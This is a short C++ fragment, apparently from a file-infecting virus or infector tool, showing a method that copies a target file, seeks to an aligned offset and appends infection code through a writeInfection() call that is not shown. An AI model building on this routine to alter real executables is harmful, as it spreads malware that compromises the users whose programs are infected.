bool Target::copyAndInfect()
{
  write(fd_dst, p.b, filesize); /* original target */
  lseek(fd_dst, aligned_filesize, SEEK_SET);

  unsigned code_size = writeInfection();
  fprintf(stderr, "wrote %u bytes, ", code_size);
  return true;
}
